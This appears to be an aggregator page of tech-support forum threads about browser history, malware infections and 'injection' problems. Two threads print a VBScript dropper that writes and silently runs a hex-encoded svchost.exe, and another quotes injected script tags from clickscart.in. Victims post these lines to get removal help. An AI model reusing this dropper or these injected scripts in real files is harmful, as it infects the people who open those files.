I was looking at our internet history and there are several sites on there and it seems no one is claiming visiting them. I want to believe that no one has been on these sites but I don't see any other way for them to appear on our internet history without someone viewing the site? Any ideas on how these got on there? Any possible way at all other than viewing the site....please, please help me. My trust and my marriage is potentially on the line here. I am looking for answers and I cannot think of anything, other than the worst. Any viruses or sites that hack into your computer and upload this stuff to your history, I know I'm grasping but I need answers. Please any thoughts at all?
 

A:Is there ANY way something could appear on your internet history without visiting?

6 more replies
Answer Match 40.74%

after visiting the site wowhead suddenly found that my cpu had multiple viruses, i removed them with zone alarm but it did not fix the problem with the desktop screen which now has a "warning" about viruses and trojans and that i should go get them fixed. there is also a bubble that appears which says something like "your computer has been infected click this bubble to sort problem". and it tries to open an anti virus web page real-av.org even if i don't click the bubble. here is my hyjack this log

More replies
Answer Match 40.74%

The other day I was just following some links to a couple of sites, one was free6.com and the other nudeamateurhoes.com and now I have a weird icon on my taskbar. The icon itself says curse when moused over but has no way to exit the icon like the others on my task-bar.

Anyone ever experience this problem, and is it related to the sites or did I get it some other way?

Btw I did manage to find it and it is in my programs folder and it is called curse.exe, but when I try to delete it I am told I don't have access rights or something like that to delete this file.

Any help is greatly appreciated.

A:Problems after visiting sites!

Hello and welcome to TSF.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a "Having problems with spyware and pop-ups? First Steps" link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

1 more replies
Answer Match 40.74%

I have an SMC router, and sometimes I need to change the IP address on my DMZ zone to connect to Xbox Live games (or it takes forever to get into games). Anyway, since yesterday I can't get into the device's webpage to change my settings; every time I try it just keeps showing "internet explorer cannot display webpage".
So I'm wondering if there is another way to change these settings? Or why is it saying that? We had a storm yesterday so I figured maybe it's down due to that, but I can't imagine it not being fixed as of yet.
Thanks in advance.
 

A:is there a way to get into my router without visiting the webpage?

Quote:
we had a storm yesterday so I figured maybe its down due to that,

It may have damaged the router.
You could try resetting the router - there will be a reset button on the back. This will take it back to factory condition; however, that will mean resetting all the settings, and if it resets and still will not let you log into the router, then you will probably no longer have any internet access, as you cannot set this up....

If you have the Setup CD that may have come with the router - you may be able to access the settings via the Setup CD.
 

1 more replies
Answer Match 40.74%

Hi, thought I'd see if all is well on the folk's PC, since I'm not up close and personal with it like this often. For one thing I think the google toolbar entries are different than they are on other machines I have it on. (Mainly want to make sure nothing sinister is going on, but would also be interested in shutting off everything that can be. For example I did install Windows Messenger and enable Remote Assistance since we are going to try that when the need arises after I leave again, but assume I should figure out how to keep Windows Messenger from being on all the time. It's not enabled in msconfig or anything.)

Here's their log. We all thank you!

Logfile of HijackThis v1.99.1
Scan saved at 3:19:25 PM, on 9/3/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)


A:Mom & dad's HJT ok? Good kid checkin up while visiting! :)

P.S., I don't know if people can tell when you've chosen about:blank as your IE start page on purpose, but I did. Although I wouldn't know how to tell if there was also a bad about:blank present. I did run Housecall, just a couple tribalfusion thingies found.
 

1 more replies
Answer Match 40.74%

Lots of people on social media sites like using URL shorteners to link people to different sites. The only problem I have with this is that I cannot see the destination. Is there anything out there that can allow me to test a link's identity before visiting it?

A:Test URLs before visiting them?

I use this site: http://longurl.org/expand

3 more replies
Answer Match 40.74%

Hello,

I just uninstalled Farcry 2 (After finishing a version installed from legitimate DVD-ROM) through the Control panel on VISTA 32-bit. After the uninstall finished successfully, my Comodo firewall blocked a setup.exe file from initiating a 'buffer overflow attack' on explorer.exe from that setup.exe.

The setup.exe was digitally signed to Ubisoft according to properties, so I allowed it, then got a Comodo popup saying it was blocked and advising me to terminate the exe (explorer or setup.exe, I'm not sure which - explorer didn't visibly terminate afaik). The action in Comodo logs was a 'shellcode injection'. I don't think I'm infected as such, but can't find anything relating to this on the web - can anyone tell me what happened here or advise on what to do? I'm running virus-scans now but I'm a tech-noob and would appreciate any help. Apologies if I've posted in the wrong place, not sure where this issue goes tbh :-(

Thank you.

A:Shellcode injection/buffer overflow after uninstalling Farcry 2

To be on the safe side, try these and post the logs.

We need to check for rootkits with RootRepeal.

Download RootRepeal from the following location and save it to your desktop.
Direct Download (Recommended): Primary Mirror, Secondary Mirror, Secondary Mirror, Secondary Mirror
Zip Mirrors (Recommended if you have a slower connection or if the Direct Download mirror is down): Primary Mirror, Secondary Mirror, Secondary Mirror
Rar Mirrors - Only if you know what a RAR is and can extract it: Primary Mirror, Secondary Mirror, Secondary Mirror

Extract RootRepeal.exe from the archive (If you did not use the "Direct Download" mirror).
Open on your desktop.
Click the tab.
Click the button.
Check all seven boxes:
Push Ok
Check the box for your main system drive (Usually C:), and press Ok.
Allow RootRepeal to run a scan of your system. This may take some time.
Once the scan completes, push the button. Save the log to your desktop, using a distinctive name, such as RootRepeal.txt. Include this report in your next reply, please.
----------------------------------
Please note: If Rootrepeal fails to run, try this step: Click Settings - Options. Set the Disk Access slider to High
Also try: right-click on rootrepeal.exe and rename it to tatertot.scr
======================
Please download Win32kDiag.exe by AD and save it to your desktop.
alternate download 1
alternate download 2
This tool will create a diagnostic report.
Double-click on Win32kDiag.exe to run and let it finish. When it states Finished! Press any ... Read more

1 more replies
Answer Match 40.74%

I make music on Audiotool.com but ever since I downloaded a file I didn't want to, things went wacky. I found this in the page source info:
<script src="http://us.clickscart.in/js/jquery-1.8.2.min.js" type="text/javascript"></script>
<script src="http://us.clickscart.in/js/redir.js" type="text/javascript"></script>
A similar problem to somebody else online... http://stackoverflow.com/questions/...-injection-in-browser?answertab=votes#tab-top
This script does not allow the app to load on the site (audiotool.com/app). Please, is there any way to fix this problem? A way to get rid of the Script and fix the way that site runs for me? Thanks.
 

A:Possible Cross Site Scripting, Javascript Injection Removal?

This is a web design issue, not a malware cleaning issue so moved to web design
 

4 more replies
Answer Match 40.74%

I'm trying to successfully deploy Windows 10 on a Dell OptiPlex 790 in my lab environment in order to push Windows 10 out to several of these PCs currently in production. Despite the fact that Dell does not offer a driver pack for Windows 10 for the 790, an upgrade to Windows 10 using the Windows Update method works fine; however, when I run a LiteTouch install, the keyboard and mouse do not work unless I am using a PS2 keyboard and mouse.

Upon further investigation, I found that the "USB Root Hub" device drivers are not properly installed on the deployed OptiPlex 790. My steps for a solution thus far have produced no meaningful results. I have tried the following:

1. From a working installation of Windows 10 on an OptiPlex 790, performed a full driver backup/export and imported into MDT 2013 Out-of-Box Driver folder for model-specific-injection task sequence. After deployment completed successfully with 0 errors and 0 warnings, the drivers are still not loaded and keyboard/mouse are nonfunctional.

2. Created an application package to silently install Intel Chipset during the LiteTouch OS installation, which includes the proper USB drivers for the OptiPlex 790. Results are the same; yet if I run the install after deployment, the drivers are installed successfully.

I'm just about out of ideas on this one, but I KNOW there has to be something that can work. It doesn't make sense that a manual install of the chipset can produce positive results but the same cannot... Read more

A:Deployment Issue - MDT 2013 / OptiPlex 790 / Driver Injection

I have a Dell OptiPlex 360 with Win10 and a Dell OptiPlex 755 with Linux Mint 17.2; both are older and are the standard size cases. I've found that most computers that have the PS/2 ports also require a BIOS setting to Enable Legacy USB to get built-in support for USB 2.0 ports and USB keyboards and mice plugged into them. So far I've not seen BIOS support for USB 3.0 ports; they have required software installed in/supported by the Operating System. Because of the change of some motherboards in leaving off the PS/2 ports I have changed my KVM from the PS/2 type to USB type.

1 more replies
Answer Match 40.74%

I make music on Audiotool.com but ever since I downloaded a file I didn't want to, things went wacky. I found this in the page source info:
<script src="http://us.clickscart.in/js/jquery-1.8.2.min.js" type="text/javascript"></script>
<script src="http://us.clickscart.in/js/redir.js" type="text/javascript"></script>
A similar problem to somebody else online... How to remove javascript file injection in browser? - Stack Overflow
This script does not allow the app to load on the site (audiotool.com/app). Please, is there any way to fix this problem? A way to get rid of the Script and fix the way that site runs for me? Thanks.

A:Possible Cross Site Scripting, Javascript Injection Removal?

Hi and Welcome to TSF!

I recommend you have our malware team help get rid of the javascript injection. Could have been a file that runs as an add-on. If no virus is found, please return here.

Please read all of the following instructions found here: NEW INSTRUCTIONS - Read This Before Posting For Malware Removal Help

After reading all of the instructions found above post the required logs in a new thread: Virus/Trojan/Spyware Help

Please note that the virus team is very busy and will get to you in due time. If you do not get a reply within 72 hours then you may bump the post.

Do not post any logs here!

2 more replies
Answer Match 40.74%

This is the strangest thing I've ever seen and there is NOTHING on Google about it.

About two weeks ago, seemingly out of nowhere, almost every subfolder on my D drive (not my main, my C drive is fine) has a folder in it that has been renamed to:

__rar_tmp

and I mean it's almost in every folder, it's completely broken all my steam games just because it breaks the directory. I'm guessing i'm out of luck because no one I have asked IT pro or not has not heard of this.

I have my D drive root set as my rar temp directory, but it's been that way for years and usually it only makes a few folders with names like $rar. So I have no idea if it's a trojan or what. If anyone has any ideas i'd love to hear it!

A:Bizarre folder injection issue (virus/trojan?)

Have you downloaded some sort of game that came through as an incomplete download or unzip, and caused the _rar_tmp files to appear?

I am not into any type of gaming, however, it appears there is no reputable information coming from the malware community on the issue you are having.

2 more replies
Answer Match 40.74%

Hi

I am unsure what is infecting my computer but it is adding the following script to all local html files whenever the computer restarts:

<script Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A9"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

I tried to follow this topic: http://www.bleepingcomputer.com/forums/topic335436.html but it was too messy for me to understand so I'm asking to start over.

All the best
Sagi

DDS Log:
.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 8.0.7600.16385
Run by Administrator at 23:28:27 on 2012-02-18
Microsoft Windows 7 Ultimate 6.1.7600.0.1255.972.1033.18.2046.1111 [GMT 2:00]
.
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\sppsvc.exe
C:\Windows\System32\svc... Read more

A:svchost.exe script injection into local html files

help!! ;/
i added GMER DDS and ATTACH .log s

3 more replies
Answer Match 40.74%


http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html

http://threatpost.com/en_us/blogs/new-firefox-flaw-enables-url-spoofing-code-injection-062210

A prominent security researcher has identified a problem with the way that Mozilla Firefox handles links that are opened in a new browser window or tab, enabling attackers to inject arbitrary code into the new window or tab while still keeping a deceptive URL in the browser's address bar.
 

A:New Firefox Flaw Enables URL Spoofing, Code Injection

6 more replies
Answer Match 40.74%

Hi

I am unsure what is infecting my computer but it is adding the following script to all local html files whenever the computer restarts:

[codebox]
<script Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A...00"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
[/codebox]

I have run DDS and attached the log but I can only run GMER in safe mode; running normally I get a BSOD of 'bad pool header' type as soon as GMER starts running.

Sorry this is vague; I have run MalwareBytes, Super AntiSpyware, SpyBot Search & Destroy, Advanced System Protector and A Squared Free. They all locate stuff which reappears every time the computer restarts. I ran all these programs after disconnecting from the internet.

Thanks in advance and I would really appreciate any light you could shed on this - I haven't been able to find anything through Google of this issue.

All the best
Mike

A:svchost.exe script injection into local html files

Hi,

Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.

Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.

The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.

Thanks

25 more replies
Answer Match 40.74%

I have an Intel(R) WiFi Link 5100 AGN wifi adapter and it doesn't support packet injection.
Please tell me about any patch file to resolve it. I want to enable packet injection on it. Help me.

A:Intel(R) WiFi Link 5100 AGN packet injection

  
Quote: Originally Posted by Ajk

I have an Intel(R) WiFi Link 5100 AGN wifi adapter and it doesn't support packet injection.
Please tell me about any patch file to resolve it. I want to enable packet injection on it. Help me.

As far as I know it doesn't, and why do you want to do packet injection? We might be able to help with a workaround.
Ken

4 more replies